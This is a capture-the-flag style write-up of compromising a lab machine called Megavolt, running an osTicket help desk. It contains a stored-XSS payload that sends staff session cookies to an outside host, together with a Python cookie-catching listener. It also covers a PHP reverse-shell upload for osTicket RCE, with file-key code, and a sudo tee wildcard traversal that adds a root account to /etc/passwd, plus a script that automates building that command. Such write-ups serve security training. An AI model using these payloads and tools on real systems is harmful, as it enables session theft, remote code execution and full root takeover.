Megavolt
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 3000 -Pn 192.168.183.115
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 13:29 +08
Nmap scan report for 192.168.183.115
Host is up (0.17s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
We can start proxying traffic through Burp.
OSTicket -> XSS Admin Cookie
Port 80 hosted an OSTicket instance, a product with many published vulnerabilities and exploits:

I registered a new user and opened a ticket. When I checked its status, a staff member named 'Alfred Smith' had already closed it:

This confirms that a staff user actually opens the tickets, so a stored XSS payload delivered through a ticket should execute in their browser. The attachment upload function is vulnerable to XSS:
We can upload this HTML file as an attachment to steal the staff user's session cookie:
<script>new Image().src='http://192.168.45.208/?cookie=' + encodeURI(document.cookie);</script>
This only works because the session cookie is readable from JavaScript, i.e. it is not flagged HttpOnly. Note that encodeURI() leaves '=', ';' and '&' unencoded; encodeURIComponent() is the safer choice for a query-string value. As soon as we upload the file and submit the ticket, the callback arrives on our listener:

Using this cookie, we can log in to the OSTicket staff panel at /scp by swapping in the stolen cookie value within Burp:

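As an added example (not code from the writeup), here is a small listener for the beacon above. It assumes the payload calls back to http://<attacker>:8000/?cookie=<encodeURI(document.cookie)> as in the script tag; the port, the log format and the sample request paths are this example's own choices, and the cookie name OSTSESSID in the sample is a constructed value.

```python
#!/usr/bin/env python3
"""Cookie-catching listener for the XSS beacon (added example, not the
writeup's code). Run it, then watch for '[+]' lines as victims load the
attachment."""
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit


def extract_cookies(request_path: str) -> dict:
    """Parse the 'cookie' query parameter out of a request path and split
    it into {name: value}. The query is split on '&' only, because
    encodeURI() leaves ';' and '=' in the cookie string unencoded and we
    must not treat ';' as a parameter separator."""
    query = urlsplit(request_path).query
    raw = ""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "cookie":
            raw = unquote(value)  # undo the %20 etc. that encodeURI added
            break
    cookies = {}
    for part in raw.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")
        cookies[name.strip()] = value.strip()
    return cookies


class CookieCatcher(BaseHTTPRequestHandler):
    def do_GET(self):
        cookies = extract_cookies(self.path)
        if cookies:
            for name, value in cookies.items():
                print(f"[+] {self.client_address[0]} {name}={value}", flush=True)
        else:
            print(f"[-] {self.client_address[0]} {self.path}", flush=True)
        # 204 keeps the victim's page quiet; the Image() request ignores the body anyway
        self.send_response(204)
        self.end_headers()

    def log_message(self, *args):
        pass  # silence the default access log; we print our own lines


if __name__ == "__main__":
    # Constructed sample of what the beacon sends, to show the parsing offline
    print(extract_cookies("/?cookie=OSTSESSID=abc123;%20lang=en"))
    HTTPServer(("0.0.0.0", 8000), CookieCatcher).serve_forever()
```

Start it on the attacking host before submitting the ticket; the first '[+]' line that names the staff session cookie is the value to paste into Burp.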
OSTicket RCE
Within the settings of the Admin Panel, we can find the version of OSTicket that is running:

This version is vulnerable to an RCE exploit. To exploit it, we first need to enable the storage plugin that keeps attachments on the machine's filesystem instead of in the database:

Afterwards, in the settings, switch the attachment storage setting over to the filesystem plugin:

Then, we open a new ticket from the user account and upload a PHP reverse shell as the attachment.

View the ticket from the Administrator account:

If we click on the attachment, it generates a GET request to file.php with a key:

This is the URL key. We also need a second key, the file key, which is derived from the attachment's contents: the raw SHA-1 digest of the file, base64-encoded with '+' and '/' replaced by '-' and '_' and the '=' padding dropped. It can be generated like this:
$ php -a
Interactive shell
php > $sha1 = base64_encode(sha1_file('shell.php', true));
php > print(str_replace(array('=','+','/'), array('','-','_'), $sha1));
Y2_qPxdA2XMAeDyyloBdYykx9uE
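The same file key computed in Python, as an added example that is not code from the writeup or from osTicket. It performs exactly the transformation in the PHP snippet above (raw SHA-1, then unpadded URL-safe base64), so it yields the same key for the same file; the shell path and the check helper are this example's own additions.

```python
#!/usr/bin/env python3
"""osTicket-style file key for an attachment (added example)."""
import base64
import hashlib
import sys


def osticket_file_key(data: bytes) -> str:
    """Raw SHA-1 of the data, base64 with '+'->'-' and '/'->'_', no '='.
    urlsafe_b64encode does the character swap; rstrip drops the padding."""
    digest = hashlib.sha1(data).digest()
    return base64.urlsafe_b64encode(digest).decode("ascii").rstrip("=")


def file_key_for_path(path: str) -> str:
    with open(path, "rb") as fh:
        return osticket_file_key(fh.read())


def same_key(local_path: str, expected_key: str) -> bool:
    """True if the local copy still hashes to a key seen earlier. Editing
    the shell (for example changing the callback IP) changes the key, so
    recompute it before every upload."""
    return file_key_for_path(local_path) == expected_key


if __name__ == "__main__":
    # Usage: python3 filekey.py shell.php
    for path in sys.argv[1:]:
        print(file_key_for_path(path), path)
```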
Then, we can finally use this repository's script to trigger the shell:
The exploit took several attempts before it worked. If it fails, upload the shell under a different name; in my case, shell.php worked.

The script brute-forces the storage directory the PHP shell was written to, then requests the file to execute it:

Privilege Escalation
Sudo Tee + Wildcard -> Root
We can check our sudo privileges on the machine:
bash-4.2$ sudo -l
Matching Defaults entries for apache on megavolt:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User apache may run the following commands on megavolt:
(ALL) NOPASSWD: /usr/bin/tee /var/log/httpd/*
The wildcard sits in the argument position. sudo matches command-line arguments with shell-style globbing in which * also matches / (only wildcards in the command path itself stop at /), so an argument like /var/log/httpd/../../../etc/passwd still satisfies the rule, and we can tee into any file on the system as root. Keep in mind that tee without -a truncates the target, so the existing contents have to be written back as well. First, generate a password hash for a new account:
$ openssl passwd -1 hello123
$1$/l2LqOov$SE/j5UXGMIShXVQVjiEjJ.
Then, write the current contents plus a new UID 0 / GID 0 entry to /etc/passwd with this one-liner (the entry needs all seven passwd fields):
(cat /etc/passwd && echo 'innocent:$1$/l2LqOov$SE/j5UXGMIShXVQVjiEjJ.:0:0:innocent:/root:/bin/sh') | sudo tee /var/log/httpd/../../../../../../etc/passwd
This adds the new entry to /etc/passwd, and we can su innocent with the password hello123 to become root:

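To make the sudo reasoning concrete, here is an added example (not part of the writeup) that parses rule lines like the ones in the sudo -l output above, builds the traversal argument a trailing /* pattern permits, confirms it matches under the same fnmatch-style globbing sudo applies to arguments, and assembles the well-formed passwd entry and command line. The sudo -l excerpt embedded below is a constructed copy of the box's rule; the rule regex, the depth-based ../ construction and the helper names are this example's own assumptions.

```python
#!/usr/bin/env python3
"""sudo argument-wildcard traversal check (added example, not the writeup's code).

sudo compares the arguments of a sudoers rule against the user's arguments
with shell-style globbing, and a '*' in an argument also matches '/'
(only wildcards in the command path itself stop at '/'). That is what
turns '/usr/bin/tee /var/log/httpd/*' into a root write to any file."""
import fnmatch
import posixpath
import re
from typing import List, Optional, Tuple

# Constructed copy of the relevant lines from the 'sudo -l' output above
SUDO_L = """
User apache may run the following commands on megavolt:
    (ALL) NOPASSWD: /usr/bin/tee /var/log/httpd/*
"""

# (runas) [TAG: ...] /path/to/cmd [args]
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)+)?(?P<cmd>/\S+)(?:\s+(?P<args>.+))?$"
)


def parse_rules(text: str) -> List[dict]:
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append({"runas": m["runas"], "cmd": m["cmd"],
                          "args": (m["args"] or "").strip()})
    return rules


def traversal_arg(pattern: str, target: str) -> Optional[str]:
    """Argument that matches a '<dir>/*' pattern but resolves to target:
    keep the literal prefix, add one '../' per path component, append target."""
    if not pattern.endswith("/*"):
        return None
    base = pattern[:-2]
    depth = len([p for p in base.split("/") if p])
    return base + "/" + "../" * depth + target.lstrip("/")


def sudo_arg_matches(pattern: str, arg: str) -> bool:
    # fnmatchcase behaves like sudo's fnmatch() without FNM_PATHNAME: '*' spans '/'
    return fnmatch.fnmatchcase(arg, pattern)


def writable_targets(text: str, target: str = "/etc/passwd") -> List[Tuple[str, str]]:
    """(runas, argument) pairs for tee rules whose argument wildcard reaches target."""
    hits = []
    for r in parse_rules(text):
        if r["cmd"].endswith("/tee") and "*" in r["args"]:
            arg = traversal_arg(r["args"], target)
            if arg and sudo_arg_matches(r["args"], arg) and posixpath.normpath(arg) == target:
                hits.append((r["runas"], arg))
    return hits


def passwd_entry(name: str, pw_hash: str, uid: int = 0, gid: int = 0,
                 home: str = "/root", shell: str = "/bin/sh") -> str:
    """Well-formed seven-field /etc/passwd line (name:hash:uid:gid:gecos:home:shell)."""
    fields = [name, pw_hash, str(uid), str(gid), name, home, shell]
    if any(":" in f or "\n" in f for f in fields):
        raise ValueError("passwd fields may not contain ':' or newlines")
    return ":".join(fields)


def exploit_command(tee_arg: str, entry: str) -> str:
    """The one-liner: replay the existing file (tee truncates) plus the new entry."""
    return f"(cat /etc/passwd && echo '{entry}') | sudo tee {tee_arg}"


if __name__ == "__main__":
    for runas, arg in writable_targets(SUDO_L):
        entry = passwd_entry("innocent", "$1$/l2LqOov$SE/j5UXGMIShXVQVjiEjJ.")
        print(f"({runas}) tee reaches /etc/passwd via {arg}")
        print(exploit_command(arg, entry))
```

The check is deliberately limited to the trailing /* shape seen on this box; wildcards elsewhere in an argument are also matched across / and spaces by sudo, so any rule that globs an argument deserves a manual look.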
Rooted!